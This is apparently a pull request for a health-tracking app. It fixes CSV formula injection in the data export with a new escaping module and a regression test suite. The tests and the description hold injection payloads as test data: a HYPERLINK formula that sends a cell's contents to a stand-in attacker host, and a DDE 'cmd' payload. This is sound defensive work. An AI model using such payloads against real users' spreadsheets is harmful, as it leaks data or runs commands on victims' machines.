### PR TITLE
[ECSoC26] fix(export): neutralise spreadsheet formulas in the data-export CSVs (Fixes #471)

### DIFF
--- a/app/api/export-data/route.js
+++ b/app/api/export-data/route.js
@@ -2,6 +2,7 @@ import { getAuthUserId } from '@/lib/clerk-server'
 import { getSupabaseAdmin } from '@/lib/supabase-admin'
 import { logger } from '@/lib/logger'
 import { formatDateForCSV } from '@/lib/utils'
+import { toCsv } from '@/lib/csv'
 const archiver = require('archiver')
 
 export const dynamic = 'force-dynamic'
@@ -61,22 +62,6 @@ export async function GET(request) {
           controller.error(err)
         })
 
-        // Helper to generate CSV from an array of objects
-        const generateCsv = (data) => {
-          if (!data || data.length === 0) return ''
-          const keys = Object.keys(data[0])
-          const header = keys.join(',')
-          const rows = data.map(row =>
-            keys.map(key => {
-              let val = row[key]
-              if (Array.isArray(val)) val = val.join(';')
-              if (typeof val === 'string') return `"${val.replace(/"/g, '""')}"`
-              return val
-            }).join(',')
-          )
-          return [header, ...rows].join('\n')
-        }
-
         // Normalize date-like columns to YYYY-MM-DD so spreadsheets render them cleanly.
         const formatCsvDateFields = (row) => {
           const formattedRow = { ...row }
@@ -102,17 +87,22 @@ export async function GET(request) {
           return formattedRow
         }
 
+        const cycleRows = cycles || []
+        const dailyLogRows = dailyLogs || []
+
         // Append JSON files
-        archive.append(JSON.stringify(cycles, null, 2), { name: 'cycles.json' })
-        archive.append(JSON.stringify(dailyLogs, null, 2), { name: 'daily_logs.json' })
+        archive.append(JSON.stringify(cycleRows, null, 2), { name: 'cycles.json' })
+        archive.append(JSON.stringify(dailyLogRows, null, 2), { name: 'daily_logs.json' })
 
         // Format date fields before CSV generation (keep JSON exports as full ISO values)
-        const cyclesForCsv = cycles.map(formatCsvDateFields)
-        const dailyLogsForCsv = dailyLogs.map(formatCsvDateFields)
+        const cyclesForCsv = cycleRows.map(formatCsvDateFields)
+        const dailyLogsForCsv = dailyLogRows.map(formatCsvDateFields)
 
-        // Append CSV files
-        archive.append(generateCsv(cyclesForCsv), { name: 'cycles.csv' })
-        archive.append(generateCsv(dailyLogsForCsv), { name: 'daily_logs.csv' })
+        // Append CSV files. toCsv() neutralises spreadsheet formula triggers and
+        // quotes every field, so a mood note like `=HYPERLINK(...)` is displayed
+        // as text instead of being evaluated when the export is opened.
+        archive.append(toCsv(cyclesForCsv), { name: 'cycles.csv' })
+        archive.append(toCsv(dailyLogsForCsv), { name: 'daily_logs.csv' })
 
         // Finalize the archive (this triggers 'end')
         archive.finalize()

--- a/lib/csv.js
+++ b/lib/csv.js
@@ -1,0 +1,217 @@
+/**
+ * csv.js — the single source of truth for turning rows into CSV text.
+ *
+ * ## Why this module exists
+ *
+ * The data export (`/api/export-data`) writes the user's cycles and daily logs
+ * into a spreadsheet that they are explicitly encouraged to open, keep, and
+ * forward to a clinician. That makes two classes of bug expensive:
+ *
+ * 1. **Formula injection.** A spreadsheet strips the surrounding quotes from a
+ *    field *before* deciding whether the cell is a formula, so `"=1+1"` is
+ *    still evaluated as a formula on open. Any value beginning with `=`, `+`,
+ *    `-`, `@`, TAB or CR is therefore executable content, and every one of
+ *    those characters can legitimately appear in a mood note or a custom
+ *    symptom name. See {@link needsFormulaGuard}.
+ *
+ * 2. **Silent corruption.** A `jsonb` column stringified with the default
+ *    `String()` becomes the literal text `[object Object]`, and an unquoted
+ *    value that happens to contain a comma shifts every following column on
+ *    that row by one.
+ *
+ * There is exactly one rule:
+ *
+ *   > Nothing reaches a CSV file without passing through {@link escapeCsvValue}.
+ *
+ * The module has no imports, so it is safe in Route Handlers, Server
+ * Components, Client Components and plain Node scripts alike.
+ */
+
+/**
+ * Leading characters that make a spreadsheet treat a cell as an expression
+ * rather than as text.
+ *
+ * `=` and `+` start a formula in every major spreadsheet. `-` starts one in
+ * Excel (`-1+1` evaluates). `@` is Lotus-style function syntax that Excel still
+ * honours. TAB and CR are included because Excel trims leading whitespace
+ * before the formula check, so `"\t=cmd"` reaches the parser as `=cmd`.
+ */
+const FORMULA_TRIGGERS = ['=', '+', '-', '@', '\t', '\r']
+
+/**
+ * Prefixed to a guarded value. A leading apostrophe is the conventional
+ * "treat this cell as text" marker: spreadsheets consume it and display the
+ * original string, and a CSV *parser* sees it as one extra literal character
+ * rather than as a change of type.
+ */
+const FORMULA_GUARD = "'"
+
+/** RFC 4180 specifies CRLF between records. */
+export const ROW_SEPARATOR = '\r\n'
+
+/** RFC 4180 field separator. */
+export const FIELD_SEPARATOR = ','
+
+/** Separator used when flattening an array column (e.g. `symptoms`) into one cell. */
+const ARRAY_JOINER = '; '
+
+/**
+ * True when `text` would be evaluated rather than displayed by a spreadsheet.
+ *
+ * @param {string} text the *rendered* cell text, not the original value
+ * @returns {boolean}
+ */
+export function needsFormulaGuard(text) {
+  if (typeof text !== 'string' || text.length === 0) return false
+  return FORMULA_TRIGGERS.includes(text[0])
+}
+
+/**
+ * True when a value's rendering is free-form text that a user could have
+ * authored, and therefore has to be checked for formula triggers.
+ *
+ * Numbers, booleans and Dates are produced by us rather than typed by the
+ * user, and guarding them would rewrite the perfectly ordinary weight delta
+ * `-5` as the text `'-5`. Objects render as JSON, which always opens with `{`
+ * or `[`, so they can never trigger either.
+ *
+ * @param {unknown} value the original value, before rendering
+ * @returns {boolean}
+ */
+function isUserAuthoredText(value) {
+  return typeof value === 'string' || Array.isArray(value)
+}
+
+/**
+ * Renders any value as the text that should appear inside the cell, before
+ * quoting.
+ *
+ * - `null` / `undefined`        -> `''` (an empty cell, not the word "null")
+ * - `Date`                      -> ISO 8601, or `''` when invalid
+ * - `Array`                     -> elements joined with `'; '`
+ * - `object` (Postgres `jsonb`) -> compact JSON, never `[object Object]`
+ * - everything else             -> `String(value)`
+ *
+ * @param {unknown} value
+ * @returns {string}
+ */
+export function stringifyCsvValue(value) {
+  if (value === null || value === undefined) return ''
+
+  if (value instanceof Date) {
+    return Number.isNaN(value.getTime()) ? '' : value.toISOString()
+  }
+
+  if (Array.isArray(value)) {
+    return value.map((entry) => stringifyCsvValue(entry)).join(ARRAY_JOINER)
+  }
+
+  if (typeof value === 'object') {
+    try {
+      return JSON.stringify(value)
+    } catch {
+      // Circular or otherwise unserialisable — better an explicit marker than
+      // "[object Object]", which reads like real data.
+      return '[unserialisable]'
+    }
+  }
+
+  if (typeof value === 'number' && !Number.isFinite(value)) return ''
+
+  return String(value)
+}
+
+/**
+ * Escapes a single value into a CSV field: neutralises formula triggers, then
+ * quotes and doubles embedded quotes where RFC 4180 requires it.
+ *
+ * Quoting is applied only when needed, so numeric columns stay numeric on
+ * import instead of being read as text.
+ *
+ * @param {unknown} value
+ * @returns {string} a ready-to-concatenate CSV field
+ */
+export function escapeCsvValue(value) {
+  let text = stringifyCsvValue(value)
+
+  // The trigger check runs on the *rendered* text, because that is what the
+  // spreadsheet sees — checking before stringification would miss the
+  // `['=cmd', 'x']` array case. It is gated on the original value's type so
+  // that a negative number is not rewritten as text.
+  const guarded = isUserAuthoredText(value) && needsFormulaGuard(text)
+  if (guarded) text = FORMULA_GUARD + text
+
+  const mustQuote =
+    guarded ||
+    text.includes(FIELD_SEPARATOR) ||
+    text.includes('"') ||
+    text.includes('\n') ||
+    text.includes('\r') ||
+    text !== text.trim()
+
+  if (!mustQuote) return text
+
+  return `"${text.replace(/"/g, '""')}"`
+}
+
+/**
+ * Collects the column names for a set of rows.
+ *
+ * Taking the keys of the first row alone silently drops any column that only
+ * appears later — which happens whenever a nullable column is omitted by the
+ * driver. The union preserves first-seen order so the common case (uniform
+ * rows) produces exactly the column order the table has.
+ *
+ * @param {Array<Record<string, unknown>>} rows
+ * @returns {string[]}
+ */
+export function collectColumns(rows) {
+  const columns = []
+  const seen = new Set()
+
+  for (const row of rows || []) {
+    if (!row || typeof row !== 'object') continue
+    for (const key of Object.keys(row)) {
+      if (seen.has(key)) continue
+      seen.add(key)
+      columns.push(key)
+    }
+  }
+
+  return columns
+}
+
+/**
+ * Serialises an array of plain objects into an RFC 4180 CSV document.
+ *
+ * @param {Array<Record<string, unknown>>} rows
+ * @param {{ columns?: string[], includeHeader?: boolean }} [options]
+ * @param {string[]} [options.columns] explicit column order; defaults to the
+ *   union of the keys present across `rows`
+ * @param {boolean} [options.includeHeader=true]
+ * @returns {string} the CSV document, or `''` when there is nothing to write
+ */
+export function toCsv(rows, options = {}) {
+  const safeRows = Array.isArray(rows) ? rows.filter((row) => row && typeof row === 'object') : []
+  const columns = options.columns && options.columns.length > 0
+    ? options.columns
+    : collectColumns(safeRows)
+
+  if (columns.length === 0) return ''
+
+  const includeHeader = options.includeHeader !== false
+  const lines = []
+
+  // The header goes through the same escaping path as the body. Column names
+  // are ours today, but a hand-rolled header is exactly how the next injection
+  // gets in.
+  if (includeHeader) {
+    lines.push(columns.map((column) => escapeCsvValue(column)).join(FIELD_SEPARATOR))
+  }
+
+  for (const row of safeRows) {
+    lines.push(columns.map((column) => escapeCsvValue(row[column])).join(FIELD_SEPARATOR))
+  }
+
+  return lines.join(ROW_SEPARATOR)
+}

--- a/scripts/test-csv-export.js
+++ b/scripts/test-csv-export.js
@@ -1,0 +1,286 @@
+/**
+ * Regression suite for lib/csv.js and the CSV files written by
+ * app/api/export-data/route.js.
+ *
+ * Guards the fix for the CSV formula-injection bug: the data export used to
+ * write stored health values into `cycles.csv` / `daily_logs.csv` with a
+ * hand-rolled writer that quoted fields but never neutralised the leading
+ * characters (`=`, `+`, `-`, `@`, TAB, CR) that make a spreadsheet evaluate a
+ * cell instead of displaying it.
+ *
+ *   node scripts/test-csv-export.js
+ */
+
+import {
+  FIELD_SEPARATOR,
+  ROW_SEPARATOR,
+  collectColumns,
+  escapeCsvValue,
+  needsFormulaGuard,
+  stringifyCsvValue,
+  toCsv,
+} from '../lib/csv.js'
+
+let passed = 0
+let failed = 0
+
+function check(actual, expected, label) {
+  if (Object.is(actual, expected)) {
+    passed += 1
+    return
+  }
+  failed += 1
+  console.error(`  ❌ ${label}`)
+  console.error(`       expected: ${JSON.stringify(expected)}`)
+  console.error(`       actual:   ${JSON.stringify(actual)}`)
+}
+
+function checkTrue(actual, label) {
+  check(actual, true, label)
+}
+
+function section(title) {
+  console.log(`\n— ${title}`)
+}
+
+/**
+ * Parses a CSV document back into rows of raw cell text, so assertions can be
+ * written against what a spreadsheet actually reads rather than against the
+ * exact byte layout of the file.
+ */
+function parseCsv(text) {
+  const rows = []
+  let row = []
+  let field = ''
+  let inQuotes = false
+
+  for (let i = 0; i < text.length; i += 1) {
+    const char = text[i]
+
+    if (inQuotes) {
+      if (char === '"') {
+        if (text[i + 1] === '"') {
+          field += '"'
+          i += 1
+        } else {
+          inQuotes = false
+        }
+      } else {
+        field += char
+      }
+      continue
+    }
+
+    if (char === '"') {
+      inQuotes = true
+    } else if (char === FIELD_SEPARATOR) {
+      row.push(field)
+      field = ''
+    } else if (char === '\r' && text[i + 1] === '\n') {
+      row.push(field)
+      rows.push(row)
+      row = []
+      field = ''
+      i += 1
+    } else {
+      field += char
+    }
+  }
+
+  row.push(field)
+  rows.push(row)
+  return rows
+}
+
+// ───────────────────────────────────────────────────────────────────────────
+section('formula triggers are detected')
+
+check(needsFormulaGuard('=1+1'), true, '= is a trigger')
+check(needsFormulaGuard('+1'), true, '+ is a trigger')
+check(needsFormulaGuard('-1+1'), true, '- is a trigger')
+check(needsFormulaGuard('@SUM(A1)'), true, '@ is a trigger')
+check(needsFormulaGuard('\t=cmd'), true, 'leading TAB is a trigger')
+check(needsFormulaGuard('\r=cmd'), true, 'leading CR is a trigger')
+
+check(needsFormulaGuard('cramps'), false, 'plain text is not a trigger')
+check(needsFormulaGuard(''), false, 'empty string is not a trigger')
+check(needsFormulaGuard('a=b'), false, 'an = in the middle is not a trigger')
+check(needsFormulaGuard(null), false, 'null is not a trigger')
+check(needsFormulaGuard(42), false, 'a number is not a trigger')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('injection payloads are neutralised')
+
+const payloads = [
+  '=1+1',
+  '=HYPERLINK("https://example.com","click")',
+  '+1234567890',
+  '-1+1',
+  '@SUM(1+1)',
+  '\t=1+1',
+  '=cmd|\' /C calc\'!A0',
+]
+
+for (const payload of payloads) {
+  const escaped = escapeCsvValue(payload)
+  checkTrue(escaped.startsWith('"\''), `payload is guarded and quoted: ${JSON.stringify(payload)}`)
+
+  // Round-tripping through a parser must give back the original text with only
+  // the guard character in front — no data is lost, it is just inert.
+  const [[cell]] = parseCsv(escaped)
+  check(cell, `'${payload}`, `payload survives a round-trip: ${JSON.stringify(payload)}`)
+}
+
+// A custom symptom name is stored inside the `symptoms` array, so the guard has
+// to survive the array flattening rather than only applying to bare strings.
+const [[arrayCell]] = parseCsv(escapeCsvValue(['=1+1', 'cramps']))
+check(arrayCell, "'=1+1; cramps", 'a hostile first element of an array is guarded')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('ordinary values are left alone')
+
+check(escapeCsvValue('cramps'), 'cramps', 'plain text is not quoted')
+check(escapeCsvValue(42), '42', 'a number stays numeric')
+check(escapeCsvValue(-5), '-5', 'a negative number is not guarded')
+check(escapeCsvValue(0), '0', 'zero is emitted, not dropped')
+check(escapeCsvValue(true), 'true', 'a boolean is emitted')
+check(escapeCsvValue(null), '', 'null becomes an empty cell')
+check(escapeCsvValue(undefined), '', 'undefined becomes an empty cell')
+check(escapeCsvValue(''), '', 'an empty string stays empty')
+check(escapeCsvValue(Number.NaN), '', 'NaN becomes an empty cell')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('RFC 4180 quoting')
+
+check(escapeCsvValue('a,b'), '"a,b"', 'a comma forces quoting')
+check(escapeCsvValue('say "hi"'), '"say ""hi"""', 'embedded quotes are doubled')
+check(escapeCsvValue('line1\nline2'), '"line1\nline2"', 'a newline forces quoting')
+check(escapeCsvValue(' padded '), '" padded "', 'surrounding whitespace is preserved by quoting')
+
+const [[commaCell]] = parseCsv(escapeCsvValue('a,b'))
+check(commaCell, 'a,b', 'a comma-bearing value round-trips as one cell')
+
+const [[quoteCell]] = parseCsv(escapeCsvValue('say "hi"'))
+check(quoteCell, 'say "hi"', 'a quote-bearing value round-trips intact')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('value rendering')
+
+check(stringifyCsvValue(['cramps', 'fatigue']), 'cramps; fatigue', 'arrays are joined')
+check(stringifyCsvValue([]), '', 'an empty array is an empty cell')
+check(
+  stringifyCsvValue({ iv: 'abc', ciphertext: 'def' }),
+  '{"iv":"abc","ciphertext":"def"}',
+  'a jsonb column serialises to JSON, not [object Object]'
+)
+check(
+  stringifyCsvValue(new Date(Date.UTC(2026, 6, 21, 9, 30))),
+  '2026-07-21T09:30:00.000Z',
+  'a Date serialises to ISO 8601'
+)
+check(stringifyCsvValue(new Date('nope')), '', 'an invalid Date becomes an empty cell')
+
+const circular = { name: 'loop' }
+circular.self = circular
+check(stringifyCsvValue(circular), '[unserialisable]', 'a circular object is marked, not "[object Object]"')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('column collection')
+
+check(
+  collectColumns([{ a: 1, b: 2 }, { a: 3, c: 4 }]).join(','),
+  'a,b,c',
+  'columns are the union across all rows, in first-seen order'
+)
+check(collectColumns([]).length, 0, 'no rows means no columns')
+check(collectColumns(null).length, 0, 'a null row set is tolerated')
+check(collectColumns([null, { a: 1 }]).join(','), 'a', 'null rows are skipped')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('toCsv document shape')
+
+check(toCsv([]), '', 'no rows produces an empty document')
+check(toCsv(null), '', 'a null row set produces an empty document')
+
+const simple = toCsv([{ date: '2026-07-21', mood: 'calm' }])
+check(simple, `date,mood${ROW_SEPARATOR}2026-07-21,calm`, 'header and body are CRLF separated')
+
+const widened = toCsv([{ a: 1 }, { a: 2, b: 3 }])
+check(
+  widened,
+  `a,b${ROW_SEPARATOR}1,${ROW_SEPARATOR}2,3`,
+  'a column that only appears on a later row is still exported'
+)
+
+const explicitOrder = toCsv([{ a: 1, b: 2 }], { columns: ['b', 'a'] })
+check(explicitOrder, `b,a${ROW_SEPARATOR}2,1`, 'an explicit column order is honoured')
+
+const headerless = toCsv([{ a: 1 }], { includeHeader: false })
+check(headerless, '1', 'the header can be omitted')
+
+const hostileHeader = toCsv([{ '=evil': 'x' }])
+checkTrue(hostileHeader.startsWith('"\'=evil"'), 'the header row is escaped too')
+
+// ───────────────────────────────────────────────────────────────────────────
+section('end-to-end: a daily_logs export with a hostile note')
+
+const dailyLogs = [
+  {
+    id: 'e6f1',
+    user_id: 'user_123',
+    date: '2026-07-21',
+    symptoms: ['cramps', 'fatigue'],
+    mood: '=HYPERLINK("https://attacker.example/?d="&A1,"Your results")',
+    flow: 'medium',
+    encrypted_data: { iv: 'aGVsbG8=', ciphertext: 'd29ybGQ=' },
+    updated_at: null,
+  },
+  {
+    id: 'a1b2',
+    user_id: 'user_123',
+    date: '2026-07-22',
+    symptoms: [],
+    mood: 'felt better, rested',
+    flow: null,
+    encrypted_data: null,
+    updated_at: '2026-07-22T18:04:00.000Z',
+  },
+]
+
+const csv = toCsv(dailyLogs)
+const parsed = parseCsv(csv)
+
+check(parsed.length, 3, 'header plus two data rows')
+check(parsed[0].join('|'), 'id|user_id|date|symptoms|mood|flow|encrypted_data|updated_at', 'header names')
+
+const moodIndex = parsed[0].indexOf('mood')
+checkTrue(parsed[1][moodIndex].startsWith("'="), 'the hostile mood note is inert')
+check(
+  parsed[1][moodIndex],
+  `'${dailyLogs[0].mood}`,
+  'the hostile mood note still contains the full original text'
+)
+
+const symptomsIndex = parsed[0].indexOf('symptoms')
+check(parsed[1][symptomsIndex], 'cramps; fatigue', 'the symptoms array is readable')
+check(parsed[2][symptomsIndex], '', 'an empty symptoms array is an empty cell')
+
+const encryptedIndex = parsed[0].indexOf('encrypted_data')
+check(
+  parsed[1][encryptedIndex],
+  '{"iv":"aGVsbG8=","ciphertext":"d29ybGQ="}',
+  'the encrypted payload is exported as JSON'
+)
+check(parsed[2][encryptedIndex], '', 'a null encrypted payload is an empty cell')
+
+const moodWithComma = parsed[0].indexOf('mood')
+check(parsed[2][moodWithComma], 'felt better, rested', 'a comma in a note does not shift the columns')
+check(parsed[2].length, parsed[0].length, 'every row has exactly as many cells as the header')
+
+// ───────────────────────────────────────────────────────────────────────────
+if (failed > 0) {
+  console.error(`\n❌ ${failed} assertion(s) failed, ${passed} passed.`)
+  process.exit(1)
+}
+
+console.log(`\n✅ All ${passed} CSV export assertions passed.`)


### PR DESCRIPTION
## Linked Issue
Fixes #471

## Description

The data export ZIP built `cycles.csv` and `daily_logs.csv` with an inline writer inside the route handler. It quoted fields and doubled embedded quotes, which is correct for a CSV *parser* — but a spreadsheet strips the surrounding quotes **before** deciding whether a cell is a formula, so `"=1+1"` was still evaluated on open. Any stored value beginning with `=`, `+`, `-`, `@`, TAB or CR was executable content in the one file users are explicitly encouraged to download and forward to a clinician.

This moves CSV serialisation out of the route into `lib/csv.js` and puts every field — including the header row — through a single escape function.

### What the escaper does

| Input | Old output | New output |
|---|---|---|
| `=HYPERLINK("http://x","go")` | `"=HYPERLINK(...)"` — evaluated | `"'=HYPERLINK(...)"` — displayed as text |
| `{ iv: '…', ciphertext: '…' }` (jsonb) | `[object Object]` | `{"iv":"…","ciphertext":"…"}` |
| `null` | `null` (the literal word) | empty cell |
| `['cramps','fatigue']` | `cramps;fatigue` | `cramps; fatigue` |
| `-5` (number) | `-5` | `-5` — **not** guarded |
| row separator | `\n` | `\r\n` (RFC 4180) |

The formula guard is deliberately gated on the *original* value being user-authored (a string or an array). Applying it to the rendered text alone would rewrite the perfectly ordinary weight delta `-5` as the text `'-5`; my first pass did exactly that and the regression suite caught it.

### Two more defects fixed in the same helper

- **`jsonb` columns were being dropped.** `encrypted_data` is neither an array nor a string, so it fell through to `return val` and landed in the CSV as `[object Object]`. The user's encrypted payload is now exported as JSON.
- **Columns were taken from `data[0]` only.** Any column absent from the first row was missing from the header and therefore from every row. `collectColumns()` now takes the union across all rows, preserving first-seen order so the uniform case produces exactly the table's column order.

## Type of Change
- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Refactoring (clean code updates, no behavior modifications)
- [ ] Documentation update
- [ ] Performance optimization
- [x] Security patch

## Files Modified

| File | Change |
|---|---|
| `lib/csv.js` | **new** — `escapeCsvValue`, `stringifyCsvValue`, `needsFormulaGuard`, `collectColumns`, `toCsv` |
| `app/api/export-data/route.js` | inline `generateCsv` removed, calls `toCsv()`; `cycles`/`dailyLogs` guarded with `|| []` before `.map()` |
| `scripts/test-csv-export.js` | **new** — 68 assertions |

`lib/csv.js` has no imports, so it is usable from Route Handlers, Server Components, Client Components and plain Node scripts alike — the CSV export on the Insights page (#250) can build on it instead of hand-rolling a second writer.

## Testing

```bash
node scripts/test-csv-export.js
# ✅ All 68 CSV export assertions passed.

npm run build
# compiles clean
```

The suite includes a small CSV *parser*, so the assertions are written against what a spreadsheet actually reads back rather than against the exact byte layout of the file. It covers:

- all six formula triggers, plus the classic `=cmd|' /C calc'!A0` payload
- a hostile value nested inside the `symptoms` array (the guard has to survive array flattening)
- negative numbers, zero, booleans, `NaN`, `null`, `undefined`, empty strings
- RFC 4180 round-tripping for embedded commas, quotes and newlines
- `jsonb`, `Date` and circular-reference rendering
- column union across ragged rows, explicit column order, header escaping
- an end-to-end `daily_logs` export whose mood note is a `=HYPERLINK` payload, asserting the payload is inert, the full original text is still recoverable, and no row's cell count drifts from the header's

Manual check: log a day with the mood set to `=1+1`, download the export from Settings, open `daily_logs.csv` in Excel or Google Sheets. Before this change the cell shows `2`; after it, `=1+1`.

## Screenshots (if UI changes are made)
N/A — backend-only change, no UI modifications.

## Checklist
- [x] This PR is submitted under ECSOC.
- [x] Added the required **ECSoc26** label to this Pull Request.
- [x] Linked issue using `Fixes #471`.
- [x] Tested locally.
- [x] `npm run build` completes successfully.
- [x] No breaking changes introduced.
- [x] Documentation updated if required (module-level docs in `lib/csv.js`).
